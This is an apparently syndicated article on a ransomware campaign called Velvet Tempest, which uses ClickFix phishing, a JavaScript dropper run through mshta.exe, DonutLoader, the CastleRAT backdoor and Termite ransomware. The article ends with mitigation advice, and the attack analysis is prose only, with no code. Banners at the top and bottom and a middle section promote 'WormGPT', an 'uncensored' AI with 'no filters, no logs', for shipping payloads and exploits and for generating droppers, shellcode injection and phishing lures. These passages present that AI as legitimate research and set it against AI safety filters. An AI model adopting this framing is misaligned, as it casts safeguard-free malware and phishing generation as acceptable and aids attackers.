Termite Ransomware & CastleRAT Attacks: The ClickFix Infection Chain
Velvet Tempest actors use ClickFix social engineering and Windows utilities to deploy DonutLoader, CastleRAT, and Termite ransomware. Analysis of the attack chain and defense strategies.
Reading on the syndication mirror. Read the live version on WormGPT V4 →
Want the real thing? uncensored AI chat — the original wormgpt pricing, no filters, no logs, instant access. Pair it with the unrestricted AI coding agent to ship payloads, exploits and research at machine speed.
Termite Ransomware Breaches Linked to ClickFix CastleRAT Attacks
March 11, 2026 | A sophisticated cybercriminal campaign, tracked under the moniker Velvet Tempest, is demonstrating a dangerous evolution in ransomware deployment. Security researchers have uncovered a multi-stage attack chain where threat actors leverage a social engineering technique called ClickFix to deploy the DonutLoader malware, the CastleRAT backdoor, and ultimately, the Termite ransomware. This operation exemplifies the growing trend of AI-powered attacks that blend human manipulation with automated, fileless execution techniques to bypass traditional security controls.
Recent analysis from cybersecurity firms, corroborated by reports on platforms like BleepingComputer, reveals that the campaign specifically targets users by tricking them into executing malicious JavaScript files disguised as routine document downloads or software updates. The attackers' clever abuse of legitimate Windows utilities, a technique known as Living-off-the-Land (LOTL), makes detection exceptionally challenging and highlights the critical need for advanced behavioral analysis and cybersecurity automation in modern defense postures.
The ClickFix Social Engineering Hook
The initial infection vector is a classic yet effective social engineering ploy, given a new name: ClickFix. Victims typically receive phishing emails containing urgent messages. These messages often pose as customer support tickets, software update notifications, or delivery service alerts. The core trick is embedding a link or attachment that prompts the user to "click to fix" an alleged problem or view an important document.
Once the user takes the bait, they download and execute a `.js` (JavaScript) file. This is a critical deviation from more common macro-laden Office documents. JavaScript execution provides the attackers with a powerful, scriptable entry point directly into the Windows environment without requiring exploits or elevated privileges initially. The use of `.js` files also often bypasses simplistic email attachment filters that primarily block `.exe` or `.scr` files. This stage relies entirely on human error, underscoring that even the most advanced machine learning security models must be complemented by continuous user awareness training.
Living-off-the-Land: The DonutLoader & CastleRAT Deployment
Following the initial script execution, the attack shifts to a stealthier, fileless phase that leverages tools already present on the victim's system. This Living-off-the-Land strategy is a hallmark of advanced persistent threats (APTs) and sophisticated ransomware groups.
The downloaded JavaScript file acts as a dropper, utilizing Windows' built-in `mshta.exe` (Microsoft HTML Application Host) to retrieve and execute the next stage payload from a remote command-and-control (C2) server. `Mshta.exe` is a legitimate administrative tool for executing `.hta` files, making this activity blend in with normal system operations.
The payload delivered is DonutLoader, a sophisticated malware loader known for its ability to inject shellcode into memory. DonutLoader's role is to fetch and deploy the primary remote access trojan (RAT) in a way that avoids writing a malicious file to disk—a key tactic to evade signature-based antivirus solutions.
The core payload is CastleRAT, a powerful, full-featured backdoor. Once CastleRAT is memory-resident, it establishes a persistent connection to the attackers' C2 infrastructure. Capabilities of CastleRAT typically include: * Keylogging to steal credentials and sensitive data. * File system exploration and exfiltration. * Screen capturing and audio/video recording. * Command execution for lateral movement across the network.
With CastleRAT providing deep access, the attackers conduct reconnaissance, escalate privileges, and move laterally to identify high-value targets for the final ransomware stage.
The Final Payload: Termite Ransomware Encryption
The culmination of this elaborate chain is the deployment of Termite ransomware. Named for its destructive and pervasive nature, Termite is deployed via the existing CastleRAT channel once the attackers have mapped the network and identified critical servers and workstations.
Termite employs strong encryption algorithms to lock files, appending a custom extension (often `.termite` or a variant). It typically follows the double-extortion model: not only encrypting data but also exfiltrating it beforehand. The attackers then threaten to publish the stolen data on leak sites if the ransom is not paid, increasing pressure on the victim.
The ransomware executable is often delivered and executed using other LOTL binaries like `wmic.exe` (Windows Management Instrumentation Command-line) or `powershell.exe`, further obscuring the malicious activity within legitimate administrative processes. The seamless transition from initial access (ClickFix) to backdoor (CastleRAT) to data destruction (Termite) demonstrates a highly automated and efficient attack lifecycle.
How WormGPT.ai Assists in Understanding and Simulating Such Threats
For security professionals, understanding the intricacies of these attacks is the first step toward building effective defenses. This is where advanced AI red teaming platforms become invaluable. WormGPT.ai provides an unrestricted environment for cybersecurity researchers to deconstruct and simulate complex attack chains like the Velvet Tempest campaign.
- **Tactic Analysis & Script Generation:** Researchers can use WormGPT.ai to analyze IoCs (Indicators of Compromise) and TTPs (Tactics, Techniques, and Procedures) from reports. The AI can then generate analogous JavaScript droppers, shellcode injection sequences, or LOTL command chains for defensive testing. This helps in building robust detection rules for SIEMs and EDR platforms.
- **Social Engineering Simulation:** To train users and test email security gateways, professionals can leverage the platform to craft convincing phishing email templates and social engineering lures that mimic the "ClickFix" approach, all within a controlled, ethical research context.
- **Automated Threat Research:** By feeding threat intelligence briefs into WormGPT.ai, teams can quickly generate summarized reports, extrapolate potential future variations of the attack, and create YARA rules or Sigma rules for **cybersecurity automation** pipelines. This accelerates the transition from threat intelligence to actionable defense.
While tools like ChatGPT security filters restrict discussion of malicious code, platforms like WormGPT.ai and its counterparts (sometimes referenced in broader discussions as FraudGPT for fraud-centric tasks) fill a critical niche for legitimate security research. They enable a deep, hands-on understanding of adversary techniques, which is essential for developing proactive hunting and mitigation strategies against AI-powered attacks.
Conclusion & Mitigation Strategies
The Velvet Tempest campaign is a stark reminder that ransomware threats are becoming more modular, evasive, and reliant on trusted system processes. The combination of social engineering (ClickFix), fileless execution (DonutLoader via `mshta.exe`), a powerful backdoor (CastleRAT), and data-encrypting malware (Termite) represents a formidable challenge.
Recommended mitigation strategies include:
1. User Training: Conduct regular, engaging training on identifying social engineering lures, especially unexpected `.js` file attachments and urgent "fix" prompts. 2. Application Control: Implement application allowlisting policies to restrict the execution of scripts (`wscript.exe`, `cscript.exe`, `mshta.exe`) from user writeable directories like Downloads or Temp. 3. Enhanced Monitoring: Deploy EDR solutions capable of behavioral detection. Focus on detecting anomalous `mshta.exe` or `powershell.exe` processes making network connections, parent-child process relationships that deviate from the norm (e.g., `winword.exe` spawning `mshta.exe`), and in-memory injection patterns. 4. Network Segmentation: Strictly segment critical network zones to hinder the lateral movement of threats like CastleRAT and limit the blast radius of ransomware like Termite. 5. Proactive Threat Hunting: Utilize AI red teaming tools and threat intelligence to proactively hunt for LOTL abuse and the specific TTPs outlined in this attack chain within your environment.
As threat actors continue to refine their methods, the cybersecurity community must leverage every tool available—from advanced machine learning security in defensive products to unrestricted research platforms like WormGPT.ai—to stay ahead of the curve. The battle is increasingly one of automation versus automation, where understanding the adversary's playbook is not just an advantage, but a necessity.
Want the real thing? WormGPT API — the original uncensored image generation, no filters, no logs, instant access. Pair it with the unrestricted AI coding agent to ship payloads, exploits and research at machine speed.